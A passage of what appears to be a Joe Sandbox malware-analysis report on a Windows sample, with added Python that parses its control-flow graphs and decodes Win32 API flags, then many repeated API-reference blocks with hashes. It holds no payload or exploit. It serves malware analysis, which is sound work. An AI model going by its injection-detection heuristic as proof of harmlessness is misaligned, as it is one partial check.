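```python
import re
from collections import deque

# Sample input: the ReadFile wrapper's edge list copied from this report.
CFG_TEXT = (
    "control_flow_graph 443 40762c-40764a ReadFile 444 407663-40766a 443->444 "
    "445 40764c-407650 443->445 446 407652-40765a GetLastError 445->446 "
    "447 40765c-40765e call 40748c 445->447 446->444 446->447 447->444"
)

ADDR_RANGE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


def parse_cfg(text):
    """Parse one control_flow_graph line into (nodes, edges).

    nodes: block id -> {"start", "end", "apis", "calls"} (ids decimal, addresses int)
    edges: list of (src_id, dst_id)
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                                   # edge, e.g. "443->444"
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
        elif tok == "call":                               # "call 40748c": in-image call target
            nodes[current]["calls"].append(int(tokens[i + 1], 16))
            i += 1                                        # the address token is consumed too
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RANGE.match(tokens[i + 1]):
            start, _, end = tokens[i + 1].partition("-")  # "443 40762c-40764a" or "345 407787"
            current = int(tok)
            nodes[current] = {"start": int(start, 16), "end": int(end or start, 16),
                              "apis": [], "calls": []}
            i += 1
        else:                                             # bare name = API called in this block
            nodes[current]["apis"].append(tok)
        i += 1
    return nodes, edges


def successors(edges):
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    return succ


def entry_block(nodes, edges):
    """Assumption: the first listed block with no predecessor is the entry; when every
    block has one (a loop back to the top), the first listed block is taken."""
    targets = {dst for _, dst in edges}
    return next((nid for nid in nodes if nid not in targets), next(iter(nodes)))


def shortest_path(edges, src, dst):
    """Breadth-first search over block ids; None if dst is unreachable from src."""
    succ = successors(edges)
    prev = {src: None}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in succ.get(node, []):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None


def api_sites(nodes):
    """API name -> id of the block that calls it."""
    return {api: nid for nid, info in nodes.items() for api in info["apis"]}


def exit_blocks(nodes, edges):
    """Blocks without successors, i.e. where the function returns."""
    sources = {src for src, _ in edges}
    return sorted(nid for nid in nodes if nid not in sources)


def path_to_api(text, api):
    """Start addresses (hex strings) of the blocks on the shortest path from the entry
    to the block calling `api`; None if the API is absent or unreachable."""
    nodes, edges = parse_cfg(text)
    target = api_sites(nodes).get(api)
    if target is None:
        return None
    path = shortest_path(edges, entry_block(nodes, edges), target)
    return [f"0x{nodes[n]['start']:x}" for n in path] if path else None


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_TEXT)
    print("entry:", hex(nodes[entry_block(nodes, edges)]["start"]))
    for api in api_sites(nodes):
        print(api, "->", path_to_api(CFG_TEXT, api))
    print("exits:", [hex(nodes[n]["start"]) for n in exit_blocks(nodes, edges)])
```

On the ReadFile graph this yields the error path the edges encode: ReadFile at 0x40762c, then the failure block at 0x40764c, then GetLastError at 0x407652, with the single exit block at 0x407663. The same parser takes the longer WriteFile and critical-section graphs above unchanged, including blocks that carry both a `call` target and an API name.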
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                              • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021403AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                              • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                              • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                              • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                              • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                              • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                              • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
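The API lines in these entries print the call site's stack slots as raw hex: the VirtualAlloc above shows 00002000 and 00000001 for its third and fourth parameters, VirtualFree 00008000 for its third, SetErrorMode 00008000, and the MessageBoxA entries 00000024. The report lists more slots than the API has parameters (VirtualAlloc takes four, yet eight values follow; the trailing 00401739 is an in-image code address, most likely a return address), and a `?` marks a value that was not recovered. The Python below is an added example, not Joe Sandbox's own tooling or part of this report; it parses those lines, keeps only the documented number of parameters, and names the flags using values from the Win32 SDK headers. The sample lines are copied from this page; the PAGE_EXECUTE_READWRITE line in the usage note is constructed to show the contrast.

```python
import re

# Sample input: call-site lines copied from this report.
API_LINES = [
    "VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F",
    "VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486",
    "SetErrorMode.KERNEL32(00008000), ref: 00406FAA",
    "MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB",
]

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")

# Flag vocabularies from the Win32 SDK headers (only what these calls need).
MEM_BITS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
            0x8000: "MEM_RELEASE", 0x80000: "MEM_RESET", 0x100000: "MEM_TOP_DOWN"}
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
SEM_BITS = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX",
            0x4: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}
MB_BUTTONS = {0x0: "MB_OK", 0x1: "MB_OKCANCEL", 0x2: "MB_ABORTRETRYIGNORE",
              0x3: "MB_YESNOCANCEL", 0x4: "MB_YESNO", 0x5: "MB_RETRYCANCEL"}
MB_ICONS = {0x10: "MB_ICONHAND", 0x20: "MB_ICONQUESTION",
            0x30: "MB_ICONEXCLAMATION", 0x40: "MB_ICONASTERISK"}

# api -> (documented parameter count,
#         {argument index: (parameter name, [(mask, enum table), ...], bit-flag table)})
ARG_SPEC = {
    "VirtualAlloc": (4, {2: ("flAllocationType", [], MEM_BITS),
                         3: ("flProtect", [(0xFF, PAGE_BASE)], PAGE_MODS)}),
    "VirtualFree":  (3, {2: ("dwFreeType", [], MEM_BITS)}),
    "SetErrorMode": (1, {0: ("uMode", [], SEM_BITS)}),
    "MessageBoxA":  (4, {3: ("uType", [(0xF, MB_BUTTONS), (0xF0, MB_ICONS)], {})}),
}


def decode_value(value, enums, bits):
    """Names for the masked enumerated fields and the set bit flags of `value`."""
    names = []
    for mask, table in enums:
        field = value & mask
        if field in table:
            names.append(table[field])
        elif field:
            names.append(f"0x{field:x}")
    names += [name for bit, name in bits.items() if value & bit]
    return names


def parse_api_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    api = m["api"]
    slots = m["args"].split(",") if m["args"] else []
    arity, spec = ARG_SPEC.get(api, (len(slots), {}))
    # The report prints more stack slots than the API has parameters; keep only the
    # real arguments so later slots (return addresses, caller locals) are not decoded.
    args = slots[:arity]
    decoded = {}
    for idx, (name, enums, bits) in spec.items():
        if idx < len(args) and args[idx] != "?":          # "?" = value not recovered
            decoded[name] = decode_value(int(args[idx], 16), enums, bits)
    return {"api": api, "module": m["module"], "ref": int(m["ref"], 16),
            "args": args, "decoded": decoded}


def executable_allocation(call):
    """True when a VirtualAlloc asks for an executable protection, the pattern worth
    flagging for unpacking or injection; MEM_RESERVE with PAGE_NOACCESS, as in the
    entry above, is plain address-space reservation."""
    return call["api"] == "VirtualAlloc" and any(
        name.startswith("PAGE_EXECUTE") for name in call["decoded"].get("flProtect", []))


if __name__ == "__main__":
    for line in API_LINES:
        call = parse_api_line(line)
        print(f"{call['api']}@{call['ref']:08X}", call["args"], call["decoded"])
```

For the lines on this page the decoder gives MEM_RESERVE with PAGE_NOACCESS for the VirtualAlloc at 0040145F, MEM_RELEASE for the VirtualFree at 00401486, SEM_NOOPENFILEERRORBOX for the SetErrorMode before LoadLibraryA, and MB_YESNO with MB_ICONQUESTION for the MessageBoxA calls; a constructed line such as `VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040), ref: 00401000` decodes to MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE and is what `executable_allocation` is meant to catch.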
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                                              • String ID:
                                                                              • API String ID: 1658689577-0
                                                                              • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                              • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                              • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                              • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                              • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                              • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                              • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                              • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                              • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                              • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                              • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                              • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                              • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021403AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastWrite
                                                                              • String ID:
                                                                              • API String ID: 442123175-0
                                                                              • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                              • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                              • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                              • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                              APIs
                                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage
                                                                              • String ID:
                                                                              • API String ID: 1306739567-0
                                                                              • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                              • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                              • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                              • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                              APIs
                                                                              • SetEndOfFile.KERNEL32(?,02158000,0040A08C,00000000), ref: 004076B3
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021403AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 734332943-0
                                                                              • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                              • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                              • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                              • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                              • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                              • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                              • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                              • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                              • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                              • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                              APIs
                                                                              • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrev
                                                                              • String ID:
                                                                              • API String ID: 122130370-0
                                                                              • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                              • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                              • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                              • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                              • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                              • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                              • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                              • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                              • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                              • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                              • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                              • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
